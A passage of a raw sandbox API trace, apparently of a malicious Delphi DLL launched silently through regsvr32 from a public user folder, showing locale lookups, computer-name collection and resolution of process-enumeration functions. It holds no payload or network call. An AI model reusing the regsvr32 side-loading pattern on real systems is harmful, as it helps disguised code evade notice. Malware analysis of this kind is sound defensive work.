dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0027.314] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0027.314] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0027.314] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x15080dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0027.314] GetProcAddress (hModule=0x75900000, lpProcName="GetDiskFreeSpaceExW") returned 0x7593de40 [0027.314] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23e14a, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\regsvr32.exe") returned 0x20 [0027.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23e358 | out: phkResult=0x23e358*=0x0) returned 0x2 [0027.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23e358 | out: phkResult=0x23e358*=0x0) returned 0x2 [0027.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23e358 | out: phkResult=0x23e358*=0x0) returned 0x2 [0027.314] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23e358 | out: phkResult=0x23e358*=0x0) returned 0x2 [0027.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23e358 | out: phkResult=0x23e358*=0x0) returned 0x2 [0027.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x23e358 | out: phkResult=0x23e358*=0x0) returned 0x2 [0027.315] GetThreadLocale () returned 0x409 [0027.315] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x23e298 | out: lpCPInfo=0x23e298) returned 1 [0027.315] GetThreadLocale () returned 0x409 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x23e08c, cchData=256 | out: lpLCData="2") returned 2 [0027.315] GetThreadLocale () returned 0x409 [0027.315] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Sun") returned 4 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Sunday") returned 7 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Mon") returned 4 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Monday") returned 7 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Tue") returned 4 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Tuesday") returned 8 [0027.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Wed") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Wednesday") returned 10 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Thu") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Thursday") returned 9 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Fri") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Friday") returned 7 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Sat") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x23dfd8, cchData=256 | out: lpLCData="Saturday") returned 9 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Jan") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="January") returned 8 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Feb") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="February") returned 9 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Mar") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="March") returned 6 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Apr") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="April") returned 6 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="May") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="May") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Jun") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="June") returned 5 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Jul") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="July") returned 5 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Aug") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="August") returned 7 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Sep") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="September") returned 10 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Oct") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="October") returned 8 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Nov") returned 4 [0027.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="November") returned 9 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="Dec") returned 4 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x23dfdc, cchData=256 | out: lpLCData="December") returned 9 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x23e02c, cchData=256 | out: lpLCData="$") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x23e02c, cchData=256 | out: lpLCData="0") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x23e02c, cchData=256 | out: lpLCData="0") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x23e224, cchData=2 | out: lpLCData=",") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x23e224, cchData=2 | out: lpLCData=".") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x23e02c, cchData=256 | out: lpLCData="2") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x23e224, cchData=2 | out: lpLCData="/") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x23dfe4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x23dfe4, cchData=256 | out: lpLCData="1") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x23dfe4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x23dfe4, cchData=256 | out: lpLCData="1") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x23e224, cchData=2 | out: lpLCData=":") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x23e02c, cchData=256 | out: lpLCData="AM") returned 3 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x23e02c, cchData=256 | out: lpLCData="PM") returned 3 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x23e02c, cchData=256 | out: lpLCData="0") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x23e02c, cchData=256 | out: lpLCData="0") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x23e02c, cchData=256 | out: lpLCData="0") returned 2 [0027.317] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x23e224, cchData=2 | out: lpLCData=",") returned 2 [0027.317] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76ee0000 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VariantChangeTypeEx") returned 0x76ee4c28 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNeg") returned 0x76f5c802 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarNot") returned 0x76f5ec66 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAdd") returned 0x76f05934 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarSub") returned 0x76f5d332 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMul") returned 0x76f5dbd4 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDiv") returned 0x76f5e405 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarIdiv") returned 0x76f5f00a [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarMod") returned 0x76f5f15e [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarAnd") returned 0x76f05a98 [0027.318] GetProcAddress (hModule=0x76ee0000, lpProcName="VarOr") returned 0x76f5ecfa [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarXor") returned 0x76f5ee2e [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCmp") returned 0x76efb0dc [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarI4FromStr") returned 0x76ef6fab [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR4FromStr") returned 0x76f001a0 [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarR8FromStr") returned 0x76ef699e [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarDateFromStr") returned 0x76f06ba7 [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarCyFromStr") returned 0x76f26c12 [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBoolFromStr") returned 0x76efdbd1 [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromCy") returned 0x76f07fdc [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromDate") returned 0x76ef7a2a [0027.319] GetProcAddress (hModule=0x76ee0000, lpProcName="VarBstrFromBool") returned 0x76f00355 [0027.319] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x150f45c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0027.320] GetProcAddress (hModule=0x75900000, lpProcName="InitializeConditionVariable") returned 0x77259981 [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x1508244, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0027.320] GetProcAddress (hModule=0x75900000, lpProcName="WakeConditionVariable") returned 0x772a5a7b [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x150f45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0027.320] GetProcAddress (hModule=0x75900000, lpProcName="WakeAllConditionVariable") returned 0x772245a5 [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0027.320] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x150f45c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0027.320] GetProcAddress (hModule=0x75900000, lpProcName="SleepConditionVariableCS") returned 0x759318be [0027.320] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa8 [0027.320] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac [0027.321] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23e19c, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\regsvr32.exe") returned 0x20 [0027.321] GetCommandLineW () returned="regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96" [0027.321] GetCommandLineW () returned="regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96" [0027.321] GetCommandLineW () returned="regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96" [0027.321] GetCommandLineW () returned="regsvr32.exe /s \\\"C:\\\\Users\\\\Public\\\\N3Eg\\\\N3Eg2.51N3E\\\" #96" [0027.321] GetComputerNameW (in: lpBuffer=0x23e394, nSize=0x23e390 | out: lpBuffer="N3EERVTWSM", nSize=0x23e390) returned 1 [0027.321] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75900000 [0027.321] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0027.321] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x150f51c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0027.321] GetProcAddress (hModule=0x75900000, lpProcName="CreateToolhelp32Snapshot") returned 0x7593f731 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x14f288c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0027.322] GetProcAddress (hModule=0x75900000, lpProcName="Heap32ListFirst") returned 0x759902e7 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0027.322] GetProcAddress (hModule=0x75900000, lpProcName="Heap32ListNext") returned 0x75990391 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x14f288c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0027.322] GetProcAddress (hModule=0x75900000, lpProcName="Heap32First") returned 0x75990429 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x14f288c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0027.322] GetProcAddress (hModule=0x75900000, lpProcName="Heap32Next") returned 0x75990614 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x150f51c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0027.322] GetProcAddress (hModule=0x75900000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x75990819 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0027.322] GetProcAddress (hModule=0x75900000, lpProcName="Process32First") returned 0x7596443d [0027.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x14f288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0027.323] GetProcAddress (hModule=0x75900000, lpProcName="Process32Next") returned 0x75964505 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x14f288c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0027.323] GetProcAddress (hModule=0x75900000, lpProcName="Process32FirstW") returned 0x7593fa35 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0027.323] GetProcAddress (hModule=0x75900000, lpProcName="Process32NextW") returned 0x7593faca [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x14f288c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0027.323] GetProcAddress (hModule=0x75900000, lpProcName="Process32FirstW") returned 0x7593fa35 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0027.323] GetProcAddress (hModule=0x75900000, lpProcName="Process32NextW") returned 0x7593faca [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x14f288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0027.323] GetProcAddress (hModule=0x75900000, lpProcName="Thread32First") returned 0x75967e4c [0027.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x14f288c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0027.324] GetProcAddress (hModule=0x75900000, lpProcName="Thread32Next") returned 0x75967edc [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x14f288c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0027.324] GetProcAddress (hModule=0x75900000, lpProcName="Module32First") returned 0x75990859 [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x14f288c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0027.324] GetProcAddress (hModule=0x75900000, lpProcName="Module32Next") returned 0x75990942 [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0027.324] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, 